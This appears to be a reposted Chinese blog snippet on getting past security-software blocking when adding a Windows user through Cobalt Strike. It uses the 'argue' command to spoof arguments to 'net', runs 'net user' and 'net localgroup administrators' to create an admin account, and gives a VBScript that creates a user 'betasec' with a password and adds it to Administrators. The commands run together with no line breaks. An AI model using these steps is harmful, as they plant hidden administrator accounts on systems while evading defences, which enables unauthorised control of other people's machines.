本文共 614 字,大约阅读时间需要 2 分钟。
使用CS直接用shell添加会被拦截。
使用argue命令来伪装命令的参数,然后使用run来执行,逻辑是:
效果如下,且没有被拦截:
argue net saldjfoiwjeofijoisfklasjdlfjasdfiowjefoijwoefjoaisjefojsaefoiwejfowefrun net user asdf 123 /addrun net localgroup "administrators" asdf /addnet usernet localgroup administrators
不过在删除用户的时候还是会有弹窗
set wsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&wsnetwork.ComputerNameSet ob=GetObject(os)Set oe=GetObject(os&"/Administrators,group")Set od=ob.Create("user","betasec")od.SetPassword "pass!@#!23"od.SetInfoSet of=GetObject(os&"/betasec",user)oe.add os&"/betasec"
转载地址:http://rmraf.baihongyu.com/